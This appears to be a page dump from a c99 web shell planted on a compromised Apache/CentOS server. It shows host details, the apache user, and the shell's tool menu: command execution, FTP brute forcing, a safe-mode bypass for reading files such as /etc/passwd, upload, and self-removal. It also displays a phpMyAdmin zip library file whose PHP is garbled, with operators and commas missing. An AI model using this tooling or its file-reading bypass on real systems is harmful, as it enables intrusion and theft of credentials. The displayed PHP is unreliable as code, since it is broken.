!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     zip_extension.lib.php (3.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */

/**
 * Interface for the zip extension
 * @package    phpMyAdmin
 */

/**
  * Gets zip file contents
  *
  * @param   string  $file
  * @return  array  ($error_message, $file_data); $error_message
  *                  is empty if no error
  */

function PMA_getZipContents($file)
{
    
$error_message '';
    
$file_data '';
    
$zip_handle zip_open($file);
    if (
is_resource($zip_handle)) {
        
$first_zip_entry zip_read($zip_handle);
        if (
false === $first_zip_entry) {
            
$error_message __('No files found inside ZIP archive!');
        } else {
            
/* Is the the zip really an ODS file? */
            
$read zip_entry_read($first_zip_entry);
            
$ods_mime 'application/vnd.oasis.opendocument.spreadsheet';
            if (!
strcmp($ods_mime$read)) {
                
/* Return the correct contents, not just the first entry */
                
for ( ; ; ) {
                    
$entry zip_read($zip_handle);
                    if (
is_resource($entry)) {
                        if (!
strcmp('content.xml'zip_entry_name($entry))) {
                            
zip_entry_open($zip_handle$entry'r');
                            
$file_data zip_entry_read($entryzip_entry_filesize($entry));
                            
zip_entry_close($entry);
                            break;
                        }
                    } else {
                        
/**
                         * Either we have reached the end of the zip and still
                         * haven't found 'content.xml' or there was a parsing
                         * error that we must display
                         */
                        
if ($entry === FALSE) {
                            
$error_message __('Error in ZIP archive:') . ' Could not find "content.xml"';
                        } else {
                            
$error_message __('Error in ZIP archive:') . ' ' PMA_getZipError($zip_handle);
                        }
                        
                        break;
                    }
                }
            } else {
                
zip_entry_open($zip_handle$first_zip_entry'r');
                
/* File pointer has already been moved, so include what was read above */
                
$file_data $read;
                
$file_data .= zip_entry_read($first_zip_entryzip_entry_filesize($first_zip_entry));
                
zip_entry_close($first_zip_entry);
            }
        }
    } else {
        
$error_message __('Error in ZIP archive:') . ' ' PMA_getZipError($zip_handle);
    }
    
zip_close($zip_handle);
    return (array(
'error' => $error_message'data' => $file_data));
}

/**
  * Gets zip error message
  *
  * @param   integer  error code
  * @return  string  error message
 */
function PMA_getZipError($code)
{
    
// I don't think this needs translation
    
switch ($code) {
        case 
ZIPARCHIVE::ER_MULTIDISK:
            
$message 'Multi-disk zip archives not supported';
             break;
        case 
ZIPARCHIVE::ER_READ:
            
$message 'Read error';
             break;
        case 
ZIPARCHIVE::ER_CRC:
            
$message 'CRC error';
             break;
        case 
ZIPARCHIVE::ER_NOZIP:
            
$message 'Not a zip archive';
             break;
        case 
ZIPARCHIVE::ER_INCONS:
            
$message 'Zip archive inconsistent';
             break;
        default:
            
$message $code;
    }
    return 
$message;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0162 ]--